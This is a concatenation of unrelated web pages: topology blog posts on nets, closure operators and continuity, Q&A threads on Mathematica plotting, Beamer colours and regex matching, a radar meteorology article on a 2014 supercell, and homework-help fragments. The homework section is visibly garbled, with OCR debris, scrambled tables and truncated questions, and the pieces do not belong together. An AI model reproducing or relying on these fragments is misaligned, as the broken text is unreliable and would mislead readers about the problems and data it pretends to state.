First, let’s take an $x\in\mathrm{Cl}(A)$. Then every open neighborhood $U$ of $x$ meets $A$ in a nonempty intersection, and so we can pick an $x_U\in U\cap A$. The collection of all open neighborhoods is partially ordered by inclusion, and we’ll write $U\geq V$ if $U\subseteq V$. Also, for any $U_1$ and $U_2$ we have $U_1\cap U_2\geq U_1$ and $U_1\cap U_2\geq U_2$. Thus the open neighborhoods themselves form a directed set. The function $U\mapsto x_U$ is then a net in $A$. And given any neighborhood $N$ of $x$ there is a neighborhood $U$ contained in $N$. And then for any $V\geq U$ we have $x_V\in V\subseteq U\subseteq N$, so our net is eventually in $N$. Thus we have a net which converges to $x$. Now let’s say $\Phi:D\rightarrow A\subseteq X$ is a net converging to $x\in X$. Then $\Phi$ is eventually in any open neighborhood $U$ of $x$. That is, every open neighborhood of $x$ meets $A$ in at least one point, and thus $x\in\mathrm{Cl}(A)$. So for any $A$, the closure $\mathrm{Cl}(A)$ is the collection of accumulation points of all nets in $A$. And now we can turn this around and define a closure operator by this condition. That is, we specify for each net $\Phi$ the collection of its accumulation points, and from these we derive a topology with this closure operator. Let’s see that we really have a closure operator. First of all, clearly $U\subseteq\mathrm{Cl}(U)$ for all $U$ because we can just take constant nets. Even easier is to see that there are no nets into $\varnothing$, and so its closure is still empty. Any accumulation point of a net in $U\cup V$ is the limit of a subnet, which we can pick to lie completely within either $U$ or $V$, and so $\mathrm{Cl}(U\cup V)=\mathrm{Cl}(U)\cup\mathrm{Cl}(V)$. To finish, we must show that this purported closure operator is idempotent. For this, I’ll use a really nifty trick. 
A point in $\mathrm{Cl}(\mathrm{Cl}(U))$ is the limit of some net $\Phi:D\rightarrow\mathrm{Cl}(U)$, and each of the points $\Phi(d)$ is the limit of a net $\Phi_d:D_d\rightarrow U$. So let's build a new directed set by taking the disjoint union $\biguplus\limits_{d\in D}D_d$ and defining the order as follows: if $a\in D_c$ and $b\in D_d$ for $c$ and $d$ in $D$, then $a\geq b$ if $c\geq d$, or if $c=d$ and $a\geq b$ in $D_d$. Then combining the nets $\Phi_d$ we get a net from this new directed set, which clearly has an accumulation point at the limit point of $\Phi$, and which is completely contained within $U$. This completes the verification that $\mathrm{Cl}$ is indeed a closure operator, and thus defines a topology.

November 20, 2007

Nets, Part I

And now we come to my favorite definition of a topology: that by nets. If you've got a fair-to-middling mathematical background you've almost certainly seen the notion of a sequence, which picks out a point of a space for each natural number. Nets generalize this to picking out more general collections of points. The essential thing about the natural numbers for sequences is that they're “directed”. That is, there's an order on them. It's a particularly simple order since it's total (any two elements are comparable) and the underlying set is very easy to understand. We want to consider more general sorts of “directed” sets, and we define them as follows: a directed set ${D}$ is a preorder so that for any two elements $a\in D$ and $b\in D$ we have some $c\in D$ with $c\geq a$ and $c\geq b$. That is, we can always find some point that's above the two points we started with. $c$ doesn't have to be distinct from them, though: if $a\geq b$ then $a$ is just such a point. In categorical terms this is not quite the same as saying that our preorder has coproducts, since we don't require any sort of universality here.
We might say instead that we have “weak” binary coproducts, but that might be inessentially multiplying entities, and Ockham don’t play that. However, if we also throw in the existence of “weak” coequalizers — for a pair of arrows $f:A\rightarrow B$ and $g:A\rightarrow B$ there is at least one arrow $h:B\rightarrow C$ so that $h\circ f=h\circ g$ — we get something called a “filtered” category. Since there’s no such thing as a pair of distinct parallel arrows in a preorder, this adds nothing in that case. However, filtered categories show up in the theory of colimits in categories. In fact originally colimits were only defined over filtered index categories $\mathcal{J}$. Anyhow, let’s say we have such a directed set ${D}$ at hand. If it helps, just think of $\mathbb{N}$ with the usual order. A net in a set $X$ is just a function $\Phi:D\rightarrow X$. Now we have a bunch of definitions to talk about how the image of such a function behaves. Given a subset $A\subseteq X$, we say that the net $\Phi$ is “frequently” in $A$ if for any $a\in D$ there is a $b\geq a$ with $\Phi(b)\in A$. We say that the net is “eventually” in $A$ if there is an $a\in D$ so that $\Phi(b)\in A$ for all $b\geq a$. For sequences, the first of these conditions says that no matter how far out the sequence we go we can find a point of the sequence in $A$. The second says that we will not only land in $A$, but stay within $A$ from that point on. Next let’s equip $X$ with a topology defined by a neighborhood system. We say that a net $\Phi:D\rightarrow X$ converges to a point $x\in X$ if for every neighborhood $U\in\mathcal{N}(x)$, the net is eventually in $U$. In this case we call $x$ the limit of $\Phi$. Notice that if ${D}$ has a top element $\omega$ so that $\omega\geq a$ for all $a\in D$ then the limit of $\Phi$ is just $\Phi(\omega)$. 
In a sense, then, the process of taking a limit is an attempt to say, “if ${D}$ did have a top element, where would it have to go?”

Now, a net may not have a limit. A weaker condition is to say that $x\in X$ is an “accumulation point” of the net $\Phi$ if for every neighborhood $U\in\mathcal{N}(x)$ the net is frequently in $U$. For instance, a sequence that jumps back and forth between two points ($\Phi(n)=x$ for even $n$ and $\Phi(n)=y$ for odd $n$) has both $x$ and $y$ as accumulation points.

We see in this example that if we just picked out the even elements of $\mathbb{N}$ we'd have a convergent sequence, so let's formalize this concept of picking out just some elements of ${D}$. For sequences you might be familiar with finding subsequences by just throwing out some of the indices. However for a general directed set we might not be left with a directed set after we throw away some of its points. Instead, we define a final function $f:D'\rightarrow D$ between directed sets to be one so that for all $d\in D$ there is some $d'\in D'$ so that $a'\geq d'$ implies that $f(a')\geq d$. That is, no matter “how far up” we want to get in ${D}$, we can find some point in $D'$ so that the image of everything above it lands above where we're looking in ${D}$. For sequences this just says that no matter how far out the natural numbers we march there's still a point ahead of us that we're going to keep.

Then, given a net $\Phi:D\rightarrow X$ and a final function $f:D'\rightarrow D$ we define the subnet $\Phi\circ f:D'\rightarrow X$. Now the connection between accumulation points and limits is this: if $x$ is an accumulation point of $\Phi$ then there is some subnet of $\Phi$ which converges to $x$. To show this we need to come up with a directed set $D'$ and a final function $f:D'\rightarrow D$ so that $\Phi\circ f$ is eventually in any neighborhood of $x$. We'll let the points of $D'$ be pairs $(a,U)$ where $a\in D$, $U\in\mathcal{N}(x)$, and $\Phi(a)\in U$.
We order these by saying that $(a,U)\geq(b,V)$ if $a\geq b$ and $U\subseteq V$. Given $(a,U)$ and $(b,V)$ in $D'$, then $U\cap V$ is again a neighborhood of $x$, and so $\Phi$ is frequently in $U\cap V$. Thus there is a $c$ with $c\geq a$, $c\geq b$, and $\Phi(c)\in U\cap V$. Thus $(c,U\cap V)$ is in $D'$, and is above both $(a,U)$ and $(b,V)$, which shows that $D'$ is directed. We can easily check that the function $f:D'\rightarrow D$ defined by $f(a,U)=a$ is final, and thus defines a subnet $\Phi\circ f$ of $\Phi$. Now if $N\in\mathcal{N}(x)$ is any neighborhood of $x$, then there is some $b$ with $\Phi(b)\in N$. If $(a,U)\geq(b,N)$ then $\Phi(f(a,U))=\Phi(a)\in U\subseteq N$. Thus $\Phi\circ f$ is eventually in $N$. Conversely, if $\Phi$ has a limit $x$ then $x$ is clearly an accumulation point of $\Phi$.

November 19, 2007

Continuity redux

So now we have two new ways to talk about topologies: neighborhoods, and closure operators. We can turn around and talk about continuity directly in our new languages, rather than translating them into the open set definition we started with. First let's tackle neighborhoods. Remember that a continuous function $f$ from a topological space $(X,\tau_X)$ to $(Y,\tau_Y)$ is one which pulls back open sets. That is, to every open set $V\in\tau_Y$ there is an open set $f^{-1}(V)\in\tau_X$ which $f$ sends into $V$. But in the neighborhood definition we don't have open sets at the beginning; we just have neighborhoods of points. What we do is notice that a neighborhood $N$ of a point $y$ is a set which contains an open set $V$ containing $y$. In particular we can consider neighborhoods of a point $f(x)$. Then the preimage $f^{-1}(V)$ is an open set containing $x$, which is a neighborhood! So, given a neighborhood $V$ of $f(x)$ there is a neighborhood $U$ of $x$ so that $f(U)\subseteq V$.
This is an implication of the definition of continuity written in the language of neighborhoods, and it turns out that we can turn around and derive our definition of continuity from this condition. To this end, we consider sets $X$ and $Y$ with neighborhood systems $\mathcal{N}_X$ and $\mathcal{N}_Y$, respectively. We will say that a function $f:X\rightarrow Y$ is continuous at $x$ if for every neighborhood $V\in\mathcal{N}_Y(f(x))$ there is a neighborhood $U\in\mathcal{N}_X(x)$ so that $f(U)\subseteq V$, and that $f$ is continuous if it is continuous at each point in $X$.

Now, let $V$ be an open set in $Y$. That is, a set which is a neighborhood of each of its points. We must now show that $f^{-1}(V)$ is a neighborhood of each of its points. So consider such a point $x\in f^{-1}(V)$, and its image $f(x)\in V$. Since we are assuming that $V$ is a neighborhood of $f(x)$, there must be a neighborhood $U$ of $x$ so that $f(U)\subseteq V$. But then $U\subseteq f^{-1}(V)$, and since the neighborhoods of $x$ form a filter this means $f^{-1}(V)$ is a neighborhood of $x$ as well. Thus the preimage of an open set is open.

In particular, we can consider a set $T\subseteq Y$ and its interior $\mathrm{int}_Y(T)$, which is an open set contained in $T$. And so its preimage $f^{-1}(\mathrm{int}_Y(T))$ is an open set contained in $f^{-1}(T)$. Thus we see that $f^{-1}(\mathrm{int}_Y(T))\subseteq\mathrm{int}_X(f^{-1}(T))$. Finally, we can dualize this property to see that $f(\mathrm{Cl}_X(S))\subseteq\mathrm{Cl}_Y(f(S))$. That is, the image of the closure of $S$ is contained in the closure of the image of $S$ for all subsets $S\subseteq X$.

Let's now take this as our definition of continuity, and derive the original definition from it. Well, first let's just dualize this condition to get back to say that $f^{-1}(\mathrm{int}_Y(T))\subseteq\mathrm{int}_X(f^{-1}(T))$ for all sets $T\subseteq Y$. Now any open set $V$ is its own interior, so $f^{-1}(V)\subseteq\mathrm{int}_X(f^{-1}(V))$.
But $\mathrm{int}_X(f^{-1}(V))\subseteq f^{-1}(V)$ by the definition of the interior. And so $f^{-1}(V)$ is its own interior, and is thus open.

November 16, 2007
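As a sanity check on this circle of equivalences, here is a small finite example (the two spaces and the map between them are invented for illustration): a continuous map checked both by pulling back open sets and by the closure condition $f(\mathrm{Cl}_X(S))\subseteq\mathrm{Cl}_Y(f(S))$.

```python
from itertools import chain, combinations

# Two tiny invented spaces and a map between them.
X = frozenset({1, 2, 3})
tau_X = {frozenset(), frozenset({1}), frozenset({1, 2}), X}

Y = frozenset({'a', 'b'})
tau_Y = {frozenset(), frozenset({'a'}), Y}

f = {1: 'a', 2: 'a', 3: 'b'}

def preimage(S):
    return frozenset(p for p in f if f[p] in S)

def image(S):
    return frozenset(f[p] for p in S)

def closure(S, tau, space):
    # smallest closed superset: intersect every closed set containing S
    result = space
    for U in tau:
        C = space - U          # closed sets are complements of open sets
        if S <= C:
            result = result & C
    return result

def powerset(space):
    xs = list(space)
    return [frozenset(c) for c in
            chain.from_iterable(combinations(xs, r) for r in range(len(xs) + 1))]

# Description 1: preimages of open sets are open.
open_preimages = all(preimage(U) in tau_X for U in tau_Y)

# Description 2: f(Cl_X(S)) is contained in Cl_Y(f(S)) for every subset S.
closure_condition = all(image(closure(S, tau_X, X)) <= closure(image(S), tau_Y, Y)
                        for S in powerset(X))
```

Both checks come out true for this map; changing `f` so that a preimage of an open set fails to be open would make both fail together, which is the content of the equivalence.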
https://mathematica.stackexchange.com/questions/151602/plotf-x-xmin-xmax-is-resulting-in-an-empty-graph?noredirect=1
# Plot[f,{x,xmin,xmax}] is resulting in an empty graph

I am trying to plot this function (FvD) with respect to x. It results in an empty graph.

```mathematica
A11 = 6.8*10^-20
A22 = 5.0*10^-20
A33 = 3.7*10^-20
E0 = 8.854188
E3 = 79.99
kB = 1.38064852*10^-23
T = 298
e = 1.60217662*10^-19
z = 1
h = 6.62607004*10^-34
n00 = 6.022148086*10^24
ye1 = -35*10^-3
ye2 = -45*10^-3

A132 = (Sqrt[A11] - Sqrt[A33])*(Sqrt[A22] - Sqrt[A33])
vdW = -A132/(6*Pi*x^3)
k = 1/(Sqrt[(E0*E3*kB*T)/(2*e^2*z^2*n00)])
Y1 = (z*e*ye1)/(kB*T)
Y2 = (z*e*ye2)/(kB*T)
ElDL = n00*kB*T*(2*Sqrt[(1 + 0.25*(Y1 + Y2)^2*Csch[(k*x/2)]^2)] -
   (((Y1 - Y2)^2*Exp[-k*x])/(1 + 0.25*(Y1 + Y2)^2*Csch[(k*x/2)]^2)) - 2)
DisPressure = ElDL + vdW
FvD[x] = 2*Pi*(-\[Integral]DisPressure \[DifferentialD]x)
Plot[FvD[x], {x, 1*10^-9, 1000*10^-9}]
```

What should I do?

• Post code in code blocks (use { } icon), not pictures of code. – Bob Hanlon Jul 16 '17 at 15:27
• If I haven't made a mistake, Plot[{Re[FvD], Im[FvD]}, {x, 10^-9, 200*10^-9}] shows FvD is complex. And there is a little bit of uncertainty from the floating point constants. – Bill Jul 16 '17 at 15:35
• Hi, I have now updated my question and the code is posted in code blocks. I am new to Mathematica and I am struggling a lot to make this plot work. – Askild Jul 17 '17 at 9:53

1. To define your function you need to use a Pattern in the left hand side.
2. The output of your function is complex.

However regarding (2) the imaginary part is nearly constant so I think you want only the real part. Apparent solution:

```mathematica
FvD[x_] = 2*Pi*(-\[Integral]DisPressure \[DifferentialD]x);
Plot[Re @ FvD[x], {x, 1*10^-9, 1000*10^-9}, PlotRange -> All]
```

• Thank you for helping me @Mr.Wizard. I have updated my code like you described above. However, now I receive this comment: Set::write: Tag Times in (2 \[Pi] (-(5.67161*10^-23/x^2)+49554.2 x+<<1>>/Sqrt[<<1>>]+(368.13 2.71828^(-651.462 x) <<4>> (3.85257 +Cosh[162.866 x]^2+Sinh[162.866 x]^2))/((0.412153 +1.
Csch[<<1>>]^2) (-154.867 2.71828^Times[<<2>>] <<4>> Sinh[Times[<<2>>]] (-1.+Power[<<2>>]+Power[<<2>>])+<<6>>+<<20>> <<5>> (<<1>>)))))[x_] is Protected. – Askild Jul 17 '17 at 10:54 • @Askild You should restart Mathematica (or at least the Kernel) before evaluating the modified code. If you still receive that error please see mathematica.stackexchange.com/q/11982/121 (ps: I just noticed that I uploaded a slightly different plot; I have corrected that so that it agrees with the code in my answer above.) – Mr.Wizard Jul 17 '17 at 11:22
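The diagnosis above generalizes beyond this one system: an expression that silently becomes complex-valued produces an empty (or partial) real plot, and taking the real part recovers a plottable curve when the imaginary part is known to be negligible. A toy Python sketch of the same pitfall (the function `g` is made up for illustration):

```python
import cmath

# An expression that silently goes complex, like FvD above:
def g(x):
    return cmath.sqrt(1 - x)      # real for x <= 1, complex for x > 1

xs = [0.5, 1.0, 1.5, 2.0]
values = [g(x) for x in xs]

# A real-valued plotting routine would drop the complex entries entirely,
# yielding an empty or truncated graph.  If the imaginary part is known to
# be negligible (or an artifact), plot the real part instead -- the
# analogue of Plot[Re @ FvD[x], ...] in the answer above.
real_parts = [v.real for v in values]
```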
https://tex.stackexchange.com/questions/365097/beamer-metropolis-colors
# Beamer Metropolis Colors

In the beamer metropolis package one can highlight text in orange using the \alert{} command. Further, it is possible to create a block whose header is in the same color: \begin{alertblock} --- \end{alertblock}. My question now is whether it is possible to use the color of \begin{exampleblock} --- \end{exampleblock} to highlight text in green. Either I don't find it in the documentation or it is really not possible. If so, how can I select the color using, for example, the \usepackage{color} and the respective command \textcolor{}{}? Here are the respective blocks as found on the template on Overleaf:

• You mean something along the line of \setbeamercolor{alerted text}{fg=green!80!black} ? – Moriambar Apr 17 '17 at 10:51

You could just open the beamercolorthememetropolis.sty from your TeX distribution (OS search does it for you). There you would find something like:

```latex
\definecolor{mLightBrown}{HTML}{EB811B}
\definecolor{mLightGreen}{HTML}{14B03D}
```

and following

```latex
\setbeamercolor{example text}{%
  fg=mLightGreen
}
```

So you could use \textcolor{mLightGreen}{Text}. MWE:

```latex
\documentclass{beamer}
\usetheme{metropolis}
\begin{document}
\begin{frame}
Test
\begin{exampleblock}{Test}
ASDF
\end{exampleblock}
\textcolor{mLightGreen}{\bfseries Test}\\
\textcolor{mLightGreen}{Test}
\end{frame}
\end{document}
```
https://unix.stackexchange.com/questions/159307/to-match-only-innermost-environment-by-regex
# To match only innermost environment by Regex

I want to match the innermost environment of \begin{question} and its corresponding \end{question}.

Example data:

    \section{Takayasu arteritis}
    \begin{question}
    {You get a patient. What do you notice first in this patient?}
    Absence of peripheral pulse.
    \end{question}
    \begin{question}
    {What was the first Takayasu case?}
    Young woman in Asia with red vessels in the eye. So special eye diagnosis done. Affects eye.
    \end{question}
    Fever of unknown origin can be used when you do not know what is causing the disease.
    % Show cases in MedScape and ask class.
    Aneurysms.
    \subsection{Treatment}
    \begin{question}
    {What you should always include in Takayasu treatment? What are the symptoms?}
    Blood pressure. Aneurysms which will burst without treatment. So blood pressure decreasing drugs like beta blockers along in combination with other drugs.
    \end{question}

My expected output is each question environment matched on its own, e.g.

    \begin{question}
    {You get a patient. What do you notice first in this patient?}
    Absence of peripheral pulse.
    \end{question}

and likewise for the other two question environments. How can you match only the innermost environment?

• What's your expected output? – Avinash Raj Oct 4 '14 at 20:50
• @AvinashRaj Thank you for your comment! I added the expected output. – Léo Léopold Hertz 준영 Oct 4 '14 at 20:52
• This regex will do the job: (?s)\\begin{question}.*?\\end{question} but I don't know how to implement it in Perl. – Avinash Raj Oct 4 '14 at 20:55
• Here: pcregrep -M '(?s)\\begin{question}.*?\\end{question}' file – Avinash Raj Oct 4 '14 at 21:24

Try this:

    pcregrep -M '\\begin{question}(.|\n)*?\\end{question}' file

Explanation:

• pcregrep: grep with Perl-compatible regular expressions
• -M: allow patterns to match more than one line
• (.|\n)*?: any normal character . or newline \n, matched zero or more times (*), in non-greedy mode (?)

Result: all three question environments from the example data, each matched separately rather than as one greedy span.

• Even simpler: pcregrep -M '\\begin{question}[\S\s]*?\\end{question}' file – Avinash Raj Oct 4 '14 at 21:22

Do you need it to be a pure regex solution, or just perlish?

    perl -lne 'print if(/^\\begin{question}/ .. /^\\end{question}/)' file
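The non-greedy idea behind the answers above can be cross-checked in Python (my sketch, not part of the original thread): a lazy quantifier with DOTALL stops at the first \end{question} instead of spanning to the last one.

```python
import re

# Sample LaTeX with two question environments.
tex = r"""
\begin{question}
{First question?}
Answer one.
\end{question}
\begin{question}
{Second question?}
Answer two.
\end{question}
"""

# Non-greedy .*? with re.DOTALL matches each environment separately
# instead of one match running from the first \begin to the last \end.
pattern = re.compile(r"\\begin\{question\}.*?\\end\{question\}", re.DOTALL)
matches = pattern.findall(tex)
print(len(matches))                      # → 2
print("First question?" in matches[0])   # → True
```

With a greedy `.*` the same input would yield a single match covering both environments, which is exactly the failure mode the question is about.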
http://www.chill.colostate.edu/w/Mesocyclone_observed_in_the_FRONT_network_by_the_NCAR_S-POL_and_CSU-CHILL_radars:_21_May_2014
# Mesocyclone observed in the FRONT network by the NCAR S-POL and CSU-CHILL radars: 21 May 2014

Authors: P. C. Kennedy and S. Yuter

CSU-CHILL reflectivity data collected in a 0.5 degree elevation angle PPI scan through a supercell thunderstorm located just south of the Denver International Airport at 2047 UTC on 21 May 2014. On this date, Front Range Observational Network Testbed (FRONT) operations were being conducted by the NCAR S-Pol and CSU-CHILL radars in support of the North Carolina State University ROSE (Radar Observations of Storms for Education) project. Example dual-Doppler and dual polarization plots have been prepared.

## Introduction

During the afternoon hours of 21 May 2014, the NCAR S-Pol and CSU-CHILL radars were collecting data for Prof. Sandra Yuter's ROSE (Radar Observations of Storms for Education) NSF-funded project. These two NSF research radars anchor the Front Range Observational Network Testbed (FRONT). To support dual-Doppler analyses, the ROSE project data collection procedures set the antenna control programs at both radars to synchronize the starting times of their scan sequences. A supercell thunderstorm that developed over the northeastern Denver area and then passed just south of Denver International Airport was observed in the course of the synchronized ROSE project scans. This article presents basic "snapshot" data plots obtained from a single synchronized volume scan collected on 21 May 2014 by the FRONT research radars during the ROSE project.

## Dual Doppler-based horizontal wind fields at 2.6 km MSL

During the volume scan that started at 2053:20 UTC, the supercell's hook echo had moved into the southern extremity of the east lobe of the S-Pol - CSU-CHILL radar pair. Within this lobe, the radial velocity measurements obtained by the two radars were from sufficiently different directions to support the accurate synthesis of the horizontal wind field.
The following plot shows the resultant dual Doppler wind field synthesis obtained at a height of 2.6 km MSL (approximately 1 km AGL). To support this analysis, the input polar coordinate data from each radar were interpolated to a common Cartesian grid using the NCAR SPRINT program. The horizontal grid mesh is 0.5 km and the grid origin is at CSU-CHILL. The NCAR CEDRIC program synthesized the horizontal wind field from the two gridded radial velocity input fields. The mesocyclone circulation pattern is evident, centered near the tip of the hook echo. The Storm Prediction Center (SPC) files contain several tornado reports in association with this storm (SPC reports). The plot has been annotated with the location of the SPC report of a tornado at Watkins, CO at 2045 UTC (~8 minutes before the analysis time).

## Selected S-Pol dual polarization data fields

At 2053:20 UTC, the storm was at closer range to S-Pol than to CSU-CHILL. For this reason, data from an S-Pol 0.4° elevation PPI sweep was selected to show the dual-polarization characteristics of the storm's precipitation at near-surface heights. The data shown in the following SOLO plot was subjectively thresholded / edited to remove ground clutter and non-precipitation clear air echo. An irregular boundary was drawn in the reflectivity (upper left) to identify the combined echo core and hook appendage regions. The differential propagation phase ($\psi_{dp}$) field shown in the upper right indicates that phase shifts due to the presence of heavy rain (i.e. containing large oblate drops) were accumulating in both the echo core and hook areas. The text of the NWS warnings issued for this storm consistently noted that rain wrapping around the mesocyclone would make visual tornado detection difficult.
The ~0 dB differential reflectivities ($Z_{dr}$; lower left) and enhanced linear depolarization levels ($L_{dr}$; lower right) indicate that hailstones were also a major component of the precipitation within the irregular boundary. Surface observations confirmed the presence of heavy rain and hail. At 2053 UTC the METAR observation taken at Denver International Airport (KDEN, located ~13 km northwest of the tip of the hook) included a visibility of 1 statute mile due to present weather conditions of a thunderstorm with heavy rain and small hail (+TSRAGS).

## Summary

The ROSE project is the first NSF-sponsored field project supported by the FRONT network. The life cycle of a supercell thunderstorm observed by the FRONT research radars on 21 May 2014 should provide a useful addition to the library of educational cases that the ROSE project is designed to assemble.
https://solvedlib.com/n/lexxhibs-gixst-eowl-6ohz-elo-ens-j-e-asly-sekie-exrasid,3083019
## Answers

#### Similar Solved Questions

##### 1. Fill in all the blank boxes with the appropriate chemical formula or properly spelled name. Only names and formulas written in the standard format (the format taught in this course) will be given credit. Latin names will not be given credit either. The response I am expecting could be very different from what you might find even on reputable internet sites, so make sure you use the knowledge you were taught in this course. Name all acids assuming they are under aqueous conditions. (2 points each)...

##### Gargands is a manufacturer of greeting cards. Classify its costs by matching the costs to the terms: 1. Direct materials, 2. Direct labor, 3. Indirect materials, 4. Indirect labor, 5. Other manufacturing overhead. Costs to classify: a. Artists' wages, b. Wages of warehouse workers, c. Paper, d. Depreciation on manufacturing equipment, e. Manufacturing plant...

##### The graph of the function f(z) 28 can be obtained from the graph of y = f(z) by one of the following actions: shifting the graph of f(z) downwards 28 units; shifting the graph of f(z) to the left 28 units; shifting the graph of f(z) to the right 28 units; shifting the graph of f(z) upwards 28 units.

##### How can I get the answer -1.25?
Month Qx Px Qy Py $20 Pz $25 Qz 200 Jan 50 $10 100 Feb 90 25 225 10 18 60 Mar 70 275 10 15 90 25 25 290 Apr May 12 50 15 100 15 25 320 25 15 120

Use the data from January and February. In the above table, the cross price elasticity of demand fo...

##### Consider the following reaction: 5A + B + 3C → 5D + E. The following data was collected on the reaction:

    Trial   [A]0    [B]0    [C]0    Rate (M/s)
    1       0.3     0.48    0.3     8.396
    2       0.6     0.48    0.3     8.396
    3       0.3     0.96    0.3     16.792
    4       0.3     0.48    0.6     16.792

Two mechanisms are proposed:

Mechanism 1: A + B → Y + C; X + A + C → D + 2Z + A

Mechanism 2: A + C → Y (step 1); Y + B → X + D (step 2); X + A → C (step 3)

Which mechanism best fits the data? Which is most likely the rate-determining step?

##### Three important things about the Central Limit Theorem? Two interesting things about the Central Limit Theorem? One question you still have about the Central Limit Theorem?

##### COVID 19 Co has forecast sales to be $125,000 in February, $139,000 in March, $159,000 in April, and $142,000 in May. The average cost of goods sold is 70% of sales. All sales are made on credit and sales are collected 70% in the month of sale and 30% in the month following. What is the budgeted Ac...
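For the Central Limit Theorem prompt above, a small illustrative sketch (my addition, not part of the original thread): means of uniform samples cluster around the population mean, with spread shrinking like 1/sqrt(n).

```python
import random
import statistics

# Central Limit Theorem sketch: sample means of Uniform(0, 1) draws
# concentrate around the population mean 0.5 as n grows.
random.seed(0)

def sample_mean(n):
    return statistics.fmean(random.random() for _ in range(n))

n, trials = 400, 2000
means = [sample_mean(n) for _ in range(trials)]

center = statistics.fmean(means)
spread = statistics.stdev(means)
# Population sd of Uniform(0, 1) is 1/sqrt(12) ≈ 0.2887, so the sd of a
# mean of n = 400 draws should be near 0.2887 / sqrt(400) ≈ 0.0144.
print(round(center, 2))   # close to 0.5
print(spread < 0.02)      # spread has shrunk roughly like 1/sqrt(n)
```

The histogram of `means` would also look approximately normal, which is the third thing the CLT promises beyond the center and the spread.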
##### Here is a graph of the function g. Use the graph to find the following. If there is more than one answer, separate them with commas. (a) All values at which g has a local minimum. (b) All local minimum values of g.

##### Pivot once as indicated in the given simplex tableau. Read the solution from the result. Pivot around the highlighted entry. (Simplify your answers.)

##### Question 2: Write down the equations of motion of a bead on a wheel: (a) from the frame of the wheel...

##### Find the sum of the given vectors and illustrate geometrically. $\langle-1,4\rangle, \quad\langle 6,-2\rangle$

##### How did organized labor begin?

##### Consider $X_1, X_2, \dots, X_n$ to be an iid random sample from $\mathrm{Unif}(0,\theta)$. Let $\hat{\theta} = \frac{n+1}{n}\,Y$ where $Y = \max(X_1, X_2, \dots, X_n)$. It can be easily shown that the cdf of $Y$ is $h(y) = (y/\theta)^n$ for $0 \le y \le \theta$. 1. Prove that $Y$ is a biased estimator of $\theta$ and write down the expression of the bias. 2. Prove that $\hat{\theta}$...
##### Example 1.8: Two vectors are given by $\vec{A} = 3\hat{i} - 2\hat{j}$ and $\vec{B} = -\hat{i} - 4\hat{j}$. Calculate (a) $\vec{A}+\vec{B}$, (b) $\vec{A}-\vec{B}$, (c) $|\vec{A}+\vec{B}|$, (d) $|\vec{A}-\vec{B}|$, and (e) the direction of $\vec{A}+\vec{B}$ and $\vec{A}-\vec{B}$.

##### (alat 24) Rrtonkd an Kg ntn (o ohein Ih horizontal dlxance. Follocaing Isths Llnsa BEREOmerC HSl A Toul Ru (mi Fuud Ihc thourctical projestilc Inge valuc o[ 45" dcurce Crtujr OAEr CUHAIEAIL FurR? Ilichi lmnc in Lz 45" €45 helaht in k45 cusr

##### A bake shop wants to know if there is a relationship between age and favorite flavor of bundt cake. If there are differences, they will use that information to inform their marketing strategies. A representative sample of 100 customers of the bake shop was surveyed. Each participant was asked for their age (in years) and favorite flavor of bundt cake from the following options: red velvet, lemon, chocolate chip. Age in years is a [Select] ("categorical", "quantitative") variable. Favorite...

##### Choose the correct sequence of amino acids (structure garbled; fragments: HO-CH, H3C, HC, CH2, CH3): Trp-Thr-Leu or Thr-Trp-I...
##### Problem 2: Find the eigenvalues and eigenfunctions of the following singular Sturm–Liouville problem, and work out the eigenfunction expansion of the given function $f$: $(4 - x^2)y'' - 2xy' + \lambda y = 0$, $y(-2)$ is bounded, $y(2)$ is bounded, $f(x) = 5 - 2x$.

##### What is an intertidal zone?

##### The percent distribution of live multiple delivery births (3 or more babies) in a particular year for women 15 to 54 years old is shown in the pie chart. Find each probability. Number of multiple births: 15–19: 1.3%, 20–24: 8.5%, 25–29: 21.4%, ...
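A hedged sketch of where that Sturm–Liouville problem leads (my working, assuming the intended ODE is the Legendre-type equation $(4 - x^2)y'' - 2xy' + \lambda y = 0$ on $[-2, 2]$):

```latex
% Rescale x = 2t, so d/dx = (1/2) d/dt:
\[
(4 - x^2)y'' - 2xy' + \lambda y = 0
\;\Longrightarrow\;
(1 - t^2)\,\ddot{y} - 2t\,\dot{y} + \lambda y = 0,
\]
% which is Legendre's equation; boundedness at t = \pm 1 forces
\[
\lambda_n = n(n+1), \qquad y_n(x) = P_n(x/2), \qquad n = 0, 1, 2, \dots
\]
% Since P_0(t) = 1 and P_1(t) = t, the expansion of f(x) = 5 - 2x terminates:
\[
f(x) = 5\,P_0(x/2) - 4\,P_1(x/2).
\]
```

The finite expansion is a useful sanity check: $5 \cdot 1 - 4 \cdot (x/2) = 5 - 2x$, as required.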
https://cameramath.com/es/expert-q&a/Algebra/4-Directed-ling-segment-PT-has-endpoints-whose-coordinates-are-P-5
### Still have math questions? Ask our expert tutors

Algebra

Question: 4. Directed line segment PT has endpoints whose coordinates are P(5, $-1$) and T($-5$, 3). Determine and state the coordinates of the point J that divides the segment in a ratio of $1:3$. The slope $= -\frac{2}{5}$.

Solution: View the full explanation on the CameraMath App.
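A quick sketch of the section formula for this problem (my illustration, not the app's solution): for a 1:3 split measured from P, the point is $J = \frac{1}{1+3}(1\cdot T + 3\cdot P)$.

```python
# Section formula sketch: the point dividing segment PT in ratio m:n from P
# is J = ((m*Tx + n*Px)/(m+n), (m*Ty + n*Py)/(m+n)).
def divide_segment(p, t, m, n):
    return ((m * t[0] + n * p[0]) / (m + n),
            (m * t[1] + n * p[1]) / (m + n))

P, T = (5, -1), (-5, 3)
J = divide_segment(P, T, 1, 3)
print(J)  # → (2.5, 0.0)

# The slope of PT, matching the value quoted in the question:
slope = (T[1] - P[1]) / (T[0] - P[0])
print(slope)  # → -0.4, i.e. -2/5
```

Note that J sits one quarter of the way from P to T, which is what a 1:3 ratio means here.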
https://www.gradesaver.com/textbooks/math/algebra/algebra-1-common-core-15th-edition/chapter-5-linear-functions-mid-chapter-quiz-page-321/9
## Algebra 1: Common Core (15th Edition)

Let's try to get the equation into $ax + by + c = 0$ form. $-3x - 35y - 14 = 0$ becomes $3x + 35y + 14 = 0$. Since there is a nonzero constant term after $3x + 35y$, the equation cannot be rewritten as $y = kx$, so it is not a direct variation.
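A tiny sketch of that check (my illustration, not from the textbook): in $ax + by + c = 0$ form, the relation is a direct variation exactly when $c = 0$ (with $b \neq 0$), since only then does it reduce to $y = kx$.

```python
# Direct variation test for a line given as a*x + b*y + c = 0:
# it can be written y = k*x (a direct variation) iff c == 0 and b != 0.
def is_direct_variation(a, b, c):
    return c == 0 and b != 0

print(is_direct_variation(3, 35, 14))  # → False: the constant 14 blocks y = kx
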